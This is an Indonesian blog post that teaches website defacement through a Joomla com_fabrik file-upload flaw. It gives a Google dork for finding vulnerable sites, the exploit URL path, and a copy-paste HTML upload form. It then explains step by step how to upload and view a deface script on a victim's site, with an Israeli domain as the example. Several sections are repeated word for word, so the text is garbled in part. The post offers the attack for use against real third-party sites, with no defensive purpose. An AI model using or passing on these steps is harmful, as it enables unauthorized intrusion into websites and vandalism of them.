Yo wazzap guys kembali lagi sama gw.
Assault K2 admin gans.
Kali ini kita akan membahas cara deface metode com_fabrik dengan csrf metode ini bisa di bilang juga mudah si, kalo udah ngerti :v ok langsung aja simak baik baik ea :v
Siap kan bahan-bahannya dulu :v
1.dork : inurl:index.php?option=com_fabrik
Buat Dorking di google
2.exploit nya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Taruh di belakang website contoh ( www.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload )
3.csrf nya kalean bisa buat sendiri, copy paste aja nih yang di bawah sini :v
<html>
<style type="text/css">
body {
background-color: black;
background-image: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRwi_Zmk1HfBEQTDXqyCQmMGFWhZ3wih20pEzRdZ2zz0FPo4IAVmyu0KPVICQ");
background-repeat: no-repeat;
font-family: 'Sedgwick Ave', Cursive;
background-size: 100% 100%;
}
</style>
<center>
<table height="100%" width="100%"><font color="Blue" size="100" face="cursive">ELITE CYBER TEAM</font></center></table>
<form method="POST" action="target.com" enctype="multipart/form-data"> <input type="file" name="file" /> <button> Upload </button> </form>
</html>
4. Script Kesayangan Kalean ok :v
Langsung sadja langkah pertama kita dorking dulu di mbah google :v
Buat Dorking di google
2.exploit nya : /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Taruh di belakang website contoh ( www.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload )
3.csrf nya kalean bisa buat sendiri, copy paste aja nih yang di bawah sini :v
<html>
<style type="text/css">
body {
background-color: black;
background-image: url("https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRwi_Zmk1HfBEQTDXqyCQmMGFWhZ3wih20pEzRdZ2zz0FPo4IAVmyu0KPVICQ");
background-repeat: no-repeat;
font-family: 'Sedgwick Ave', Cursive;
background-size: 100% 100%;
}
</style>
<center>
<table height="100%" width="100%"><font color="Blue" size="100" face="cursive">ELITE CYBER TEAM</font></center></table>
<form method="POST" action="target.com" enctype="multipart/form-data"> <input type="file" name="file" /> <button> Upload </button> </form>
</html>
4. Script Kesayangan Kalean ok :v
Langsung sadja langkah pertama kita dorking dulu di mbah google :v
Selanjutnya kalian masukkan exploitnya ke target kalean exploitnya ada di atas ok
Gk tau cara masukkin exploitnya?? Waduh kalean terlalu polos :v
Contoh http://www.tagetlu.co.il/masukkan exploitnya di belakang web target kalean
Kalo muncul tulisan yang kaya di atas berarti web itu vuln siap di tusbol :v
Next lalu copy link yang di atas tadi yang sudah di taro exploitnya lalu simpan ke csrf kalean kalo blm ada bisa di ambil di atas tadi :')
Kalo sudah di taro tinggal kita buka csrf nya lalu upload script deface kalean
Setelah di upload tampilannya akan berubah seperti ini
Kalo tampilan nya berubah seperti itu berarti 100% berhasil no hoax :v
Setelah itu tinggal mengakses nya dengan cara
http://www.targetlu.co.il/nama script deface lu
Dan hasilnya, Tara web sudah ter deface
Mudah kan
Gak percaya coba aja sendiri :v
Thanks karena sudah berkunjung ke web kami
Wassalamu'alaikum warahmatullahi wabarakatu
Tidak ada komentar:
Posting Komentar